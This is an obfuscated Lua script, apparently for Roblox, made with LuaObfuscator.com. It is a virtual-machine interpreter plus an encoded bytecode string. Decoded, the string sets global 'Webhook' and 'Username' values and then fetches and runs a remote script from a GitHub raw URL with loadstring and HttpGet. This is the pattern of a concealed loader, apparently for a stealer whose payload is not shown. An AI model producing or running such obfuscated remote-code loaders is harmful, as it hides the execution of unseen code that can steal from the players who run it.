--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (1 -(619 -(555 + 64))) ;v31=2 -1 ;end if (v31==1) then return v32;end end end v23=nil;function v23()local v33=931 -(857 + 67 + 7) ;local v34;local v35;while true do if (v33==(569 -(367 + 201))) then return (v35 * (1133 -((401 -119) + 595))) + v34 ;end if ((927 -(214 + 713))==v33) then v34,v35=v1(v16,v19,v19 + 2 );v19=v19 + 1 + (1066 -(68 + 997)) ;v33=1638 -(1523 + 114) ;end end end v18=3;end if (v18==4) then function v25()local v36=v24();local v37=v24();local v38=1271 -(226 + 1044) ;local v39=(v21(v37,4 -3 ,(1134 -(915 + 82)) -(32 + 85) ) * ((2 + 0)^32)) + v36 ;local v40=v21(v37,21,7 + 24 );local v41=((v21(v37,989 -(892 + 65) )==(2 -1)) and  -(1 -0)) or ((2 -1) -0) ;if (v40==(350 -(87 + 263))) then if (v39==(180 -(67 + 113))) then return v41 * (0 + 0 + 0) ;else v40=2 -1 ;v38=0 + (0 -0) ;end elseif (v40==(8135 -6088)) then return ((v39==(1187 -(1069 + 118))) and (v41 * ((953 -((1819 -1017) + 150))/(0 -0)))) or (v41 * NaN) ;end return v8(v41,v40-(1855 -(1819 -987)) ) * (v38 + (v39/((2 + 0)^52))) ;end v26=nil;function v26(v42)local v43;if  not v42 then v42=v24();if (v42==0) then return "";end end v43=v3(v16,v19,(v19 + v42) -(1 + 0) );v19=v19 + v42 ;local v44={};for v71=1 -0 , #v43 do v44[v71]=v2(v1(v3(v43,v71,v71)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v45==3) then v52=nil;v53=nil;v45=8 -4 ;end if (v45==(2 + 0)) then v50=nil;v51=nil;v45=3;end if ((9 -5)==v45) then v54=nil;while true do if (v46==0) then local v99=0 -0 ;while true do if (v99~=(1901 -(106 + 1794))) then else v46=1 + 0 ;break;end if ((0 + 0)~=v99) then else v47=0 -0 ;v48=nil;v99=1;end end end if (v46~=(10 -6)) then else while true do if (v47~=(115 -(4 + 110))) then else local v108=584 -(57 + 527) ;while true do if (v108==(1464 -(1404 + 59))) then v47=1429 -(41 + 1386) ;break;end if (v108==(0 -0)) then local v112=0 -0 ;while true do if (v112~=(104 -(17 + 86))) then else v108=1;break;end if (v112==0) then v50=nil;v51=nil;v112=1 + 0 ;end end end end end if (v47~=2) then else local v109=0 -0 ;local v110;while true do if (v109==0) then v110=0 -0 ;while true do if ((2 -1)==v110) then v47=3;break;end if (v110==(0 -0)) then local v122=166 -(122 + 44) ;while true do if (v122==(0 -0)) then v52=nil;v53=nil;v122=1;end if (v122~=(3 -2)) then else v110=1 + 0 ;break;end end end end break;end end end if (v47==(6 -3)) then v54=nil;while true do local v111=0;while true do if (v111~=0) then else local v113=0 + 0 ;while true do if (v113==(0 -0)) then if (v48==(1 + 2)) then local v149=0 + 0 ;local v150;while true do if (v149==(0 -0)) then v150=0;while true do if (v150==(0 + 0)) then local v193=0;local v194;while true do if (v193~=(0 -0)) then else v194=0;while true do if (v194==(65 -(30 + 35))) then for v210=1 + 0 ,v24() do v50[v210-1 ]=v29();end return v52;end end break;end end end end break;end end end if (v48==2) then local v151=1257 -(1043 + 214) ;local v152;while true do if ((163 -(92 + 71))==v151) then v152=0 -0 ;while true do if (v152==(1213 -(323 + 889))) then for v198=2 -1 ,v24() do local v199=580 -(361 + 219) ;local v200;local v201;local v202;local v203;while true do if (v199~=(320 -(53 + 267))) then else v200=0;v201=nil;v199=1;end if (v199==(1 + 0)) then v202=nil;v203=nil;v199=4 -2 ;end if (v199~=(1 + 1)) then else while true do if (v200~=(413 -(15 + 398))) then else local v212=982 -(18 + 964) ;while true do if (v212~=(0 -0)) then else v201=849 -(254 + 595) ;v202=nil;v212=1 + 0 ;end if (v212~=(1 + 0)) then else v200=851 -(20 + 830) ;break;end end end if (v200==(1 + 0)) then v203=nil;while true do if (v201~=(127 -(116 + 10))) then else while true do if (v202~=(1790 -(573 + 1217))) then else v203=v22();if (v21(v203,2 -1 ,1)==0) then local v218=0 + 0 ;local v219;local v220;local v221;local v222;local v223;while true do if ((1 + 0)==v218) then v221=nil;v222=nil;v218=740 -(542 + 196) ;end if (v218~=(941 -(714 + 225))) then else v223=nil;while true do if (v219==(0 -0)) then local v224=0 -0 ;local v225;while true do if (v224~=0) then else v225=0 -0 ;while true do if (v225==(0 + 0)) then v220=0;v221=nil;v225=1 + 0 ;end if (v225~=(1 -0)) then else v219=1;break;end end break;end end end if (v219==(2 + 0)) then while true do if (v220==(1 + 0)) then local v227=0 -0 ;while true do if ((1887 -(927 + 959))~=v227) then else v220=6 -4 ;break;end if (v227==0) then local v236=0 -0 ;local v237;while true do if (v236==0) then v237=732 -(16 + 716) ;while true do if (v237==(1551 -(1126 + 425))) then local v238=405 -(118 + 287) ;while true do if (v238==(0 -0)) then v223={v23(),v23(),nil,nil};if (v221==(0 -0)) then local v241=0 -0 ;local v242;while true do if ((0 -0)~=v241) then else v242=377 -(142 + 235) ;while true do if (v242==0) then v223[13 -10 ]=v23();v223[1 + 3 ]=v23();break;end end break;end end elseif (v221==(1797 -(503 + 1293))) then v223[3]=v24();elseif (v221==(5 -3)) then v223[3 + 0 ]=v24() -((1063 -(810 + 251))^(993 -(553 + 424))) ;elseif (v221==(1 + 2)) then local v251=0;while true do if (v251==0) then v223[5 -2 ]=v24() -((2 + 0)^16) ;v223[4 + 0 ]=v23();break;end end end v238=1 + 0 ;end if (1~=v238) then else v237=1;break;end end end if (v237==1) then v227=1;break;end end break;end end end end end if (v220~=2) then else local v228=733 -(711 + 22) ;local v229;local v230;while true do if (v228==(0 -0)) then v229=0 + 0 ;v230=nil;v228=1 + 0 ;end if (v228==(1 + 0)) then while true do if (v229==(0 + 0)) then v230=0 -0 ;while true do if ((1 + 0)==v230) then v220=7 -4 ;break;end if (v230~=(0 -0)) then else local v239=0 + 0 ;while true do if (v239~=(4 -3)) then else v230=754 -(239 + 514) ;break;end if (v239==(0 + 0)) then local v240=0;while true do if (v240==(1 + 0)) then v239=1330 -(797 + 532) ;break;end if (v240~=0) then else if (v21(v222,4 -3 ,1 + 0 )==(1 + 0)) then v223[4 -2 ]=v54[v223[1741 -(404 + 1335) ]];end if (v21(v222,1204 -(373 + 829) ,733 -(476 + 255) )==(1131 -(369 + 761))) then v223[2 + 1 ]=v54[v223[2 + 1 ]];end v240=1 -0 ;end end end end end end break;end end break;end end end if (v220~=(0 -0)) then else local v231=0;local v232;while true do if (v231~=(238 -(64 + 174))) then else v232=0 + 0 ;while true do if (v232~=(0 -0)) then else v221=v21(v203,2,339 -(144 + 192) );v222=v21(v203,4,6);v232=1;end if (v232==1) then v220=217 -(42 + 174) ;break;end end break;end end end if ((3 + 0)==v220) then if (v21(v222,12 -9 ,1496 -(711 + 782) )~=(1 + 0)) then else v223[7 -3 ]=v54[v223[4]];end v49[v198]=v223;break;end end break;end if (v219==(1 + 0)) then local v226=1504 -(363 + 1141) ;while true do if (v226==(1580 -(1183 + 397))) then v222=nil;v223=nil;v226=470 -(270 + 199) ;end if (v226~=1) then else v219=5 -3 ;break;end end end end break;end if (v218==0) then v219=0 + 0 ;v220=nil;v218=1 + 0 ;end end end break;end end break;end if (v201==(0 -0)) then local v215=1975 -(1913 + 62) ;local v216;while true do if (v215==(0 + 0)) then v216=0 -0 ;while true do if (v216==(1933 -(565 + 1368))) then v202=0 -0 ;v203=nil;v216=1168 -(645 + 522) ;end if (v216==(1662 -(1477 + 184))) then v201=1 -0 ;break;end end break;end end end end break;end end break;end end end v48=3 + 0 ;break;end if (v152~=0) then else local v195=0;while true do if (v195~=(856 -(564 + 292))) then else for v205=1 -0 ,v53 do local v206=0 -0 ;local v207;local v208;while true do if (v206~=(304 -(244 + 60))) then else local v213=0;while true do if (v213~=(1837 -(1045 + 791))) then else v206=1;break;end if (v213~=(0 + 0)) then else local v217=476 -(41 + 435) ;while true do if ((0 -0)==v217) then v207=v22();v208=nil;v217=1 -0 ;end if (v217~=(1002 -(938 + 63))) then else v213=1 + 0 ;break;end end end end end if (v206~=(1575 -(1281 + 293))) then else if (v207==(1126 -(936 + 189))) then v208=v22()~=0 ;elseif (v207==(4 -2)) then v208=v25();elseif (v207==(1 + 2)) then v208=v26();end v54[v205]=v208;break;end end end v52[1562 -(1381 + 178) ]=v22();v195=1614 -(1565 + 48) ;end if ((1 + 0)~=v195) then else v152=1 + 0 ;break;end end end end break;end end end v113=1 + 0 ;end if (v113==1) then v111=1139 -(782 + 356) ;break;end end end if (v111==1) then if (v48==0) then local v123=267 -(176 + 91) ;local v124;local v125;while true do if (v123==(2 -1)) then while true do if (v124~=(0 -0)) then else v125=1092 -(975 + 117) ;while true do if (v125==(1875 -(157 + 1718))) then local v196=0;local v197;while true do if (v196==(470 -(381 + 89))) then v197=0 + 0 ;while true do if (v197==(0 + 0)) then local v209=0 + 0 ;while true do if (v209==(3 -2)) then v197=3 -2 ;break;end if ((1156 -(1074 + 82))~=v209) then else v49={};v50={};v209=1;end end end if (v197~=(1 -0)) then else v125=1785 -(214 + 1570) ;break;end end break;end end end if (1==v125) then v51={};v48=1;break;end end break;end end break;end if (v123==(1018 -(697 + 321))) then v124=0 -0 ;v125=nil;v123=1 -0 ;end end end if (v48~=1) then else local v126=0 + 0 ;local v127;while true do if (v126==(0 -0)) then v127=0 + 0 ;while true do if ((1726 -(1668 + 58))~=v127) then else v52={v49,v50,nil,v51};v53=v24();v127=1228 -(322 + 905) ;end if (v127~=(612 -(602 + 9))) then else v54={};v48=2;break;end end break;end end end break;end end end break;end if (v47==(1189 -(449 + 740))) then v48=0;v49=nil;v47=873 -(826 + 46) ;end end break;end if (v46==(948 -(245 + 702))) then local v100=0 -0 ;while true do if (v100==(3 -2)) then v46=2;break;end if (v100~=(0 + 0)) then else v49=nil;v50=nil;v100=1;end end end if (v46~=(1996 -(109 + 1885))) then else v51=nil;v52=nil;v46=1901 -(260 + 1638) ;end if (v46==(443 -(382 + 58))) then local v101=0 -0 ;while true do if (v101~=0) then else v53=nil;v54=nil;v101=1 + 0 ;end if (v101==1) then v46=8 -4 ;break;end end end end break;end if (v45~=(816 -(98 + 717))) then else v48=nil;v49=nil;v45=2;end if (v45~=0) then else v46=0;v47=nil;v45=827 -(802 + 24) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v55)if (v1(v55,2)==79) then local v73=0;while true do if (v73==0) then v20=v0(v3(v55,1,1));return "";end end else local v74=v2(v0(v55,16));if v20 then local v81=0;local v82;while true do if (v81==1) then return v82;end if (v81==0) then v82=v5(v74,v20);v20=nil;v81=1;end end else return v74;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v56=0 -0 ;local v57;local v58;local v59;local v60;while true do if (v56==(0 -0)) then v57,v58,v59,v60=v1(v16,v19,v19 + ((1442 -(797 + 636)) -6) );v19=v19 + 4 ;v56=1 + 0 ;end if (v56==(1 + 0)) then return (v60 * (13838837 + 2938379)) + (v59 * (50353 + 15183)) + (v58 * (43 + 213)) + v57 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v83=v65;local v84=v66;local v85=v67;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (v98==0) then v95=v83[v87];v96=v95[1];v98=1;end if (v98==1) then if (v96<=5) then if (v96<=2) then if (v96<=0) then v87=v95[3];elseif (v96>1) then v93[v95[2]]();else v93[v95[2]]=v95[3];end elseif (v96<=3) then local v115=v95[2];local v116=v93[v95[3]];v93[v115 + 1 ]=v116;v93[v115]=v116[v95[4]];elseif (v96>4) then local v130=0;while true do if (2==v130) then v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v130=3;end if (v130==0) then v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v130=1;end if (v130==1) then v93[v95[2]]=v63[v95[3]];v87=v87 + 1 ;v95=v83[v87];v130=2;end if (4==v130) then v87=v95[3];break;end if (3==v130) then v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v130=4;end end elseif (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96<=8) then if (v96<=6) then v93[v95[2]]=v63[v95[3]];elseif (v96==7) then local v131=0;local v132;local v133;local v134;local v135;local v136;while true do if (v131==6) then v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v87=v95[3];break;end if (v131==2) then v95=v83[v87];v136=v95[2];v135=v93[v95[3]];v93[v136 + 1 ]=v135;v93[v136]=v135[v95[4]];v87=v87 + 1 ;v131=3;end if (v131==1) then v95=v83[v87];v93[v95[2]]=v63[v95[3]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v63[v95[3]];v87=v87 + 1 ;v131=2;end if (v131==5) then v87=v87 + 1 ;v95=v83[v87];v136=v95[2];v93[v136]=v93[v136](v13(v93,v136 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v131=6;end if (v131==0) then v132=nil;v133,v134=nil;v135=nil;v136=nil;v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v131=1;end if (v131==4) then v95=v83[v87];v136=v95[2];v133,v134=v86(v93[v136](v13(v93,v136 + 1 ,v95[3])));v88=(v134 + v136) -1 ;v132=0;for v190=v136,v88 do v132=v132 + 1 ;v93[v190]=v133[v132];end v131=5;end if (v131==3) then v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3]~=0 ;v87=v87 + 1 ;v131=4;end end else v93[v95[2]][v95[3]]=v95[4];end elseif (v96<=10) then if (v96>9) then do return;end else local v139=0;local v140;while true do if (v139==0) then v140=v95[2];v93[v140]=v93[v140](v13(v93,v140 + 1 ,v88));break;end end end elseif (v96==11) then v93[v95[2]]=v95[3]~=0 ;else local v142=v95[2];local v143,v144=v86(v93[v142](v13(v93,v142 + 1 ,v95[3])));v88=(v144 + v142) -1 ;local v145=0;for v146=v142,v88 do v145=v145 + 1 ;v93[v146]=v143[v145];end end v87=v87 + 1 ;break;end end end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v68,v69,v70)if v70 then local v75=0 -0 ;local v76;while true do if ((1619 -(1427 + (743 -(83 + 468))))==v75) then v76=(v68/((1 + 1)^(v69-(2 -1))))%((2 + 0)^(((v70-(1 + 0)) -(v69-(327 -(192 + 134)))) + (1277 -((2122 -(1202 + 604)) + 960)))) ;return v76-(v76%(1 + 0)) ;end end else local v77=((9 -7) + 0)^(v69-(1 + 0)) ;return (((v68%(v77 + v77))>=v77) and (3 -2)) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B034O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F2O54566A616B393733312F7363726970742F6D61696E2F7363726970742E6C756E03093O00557365726E616D6531030D3O004A616B6F62353435343635373603093O00557365726E616D653200173O0012013O00013O0026043O000E0001000200044O000E0001001206000100033O00300700010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026043O00010001000100044O00010001001206000100033O0030050001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O000A3O00017O00",v9(),...);end
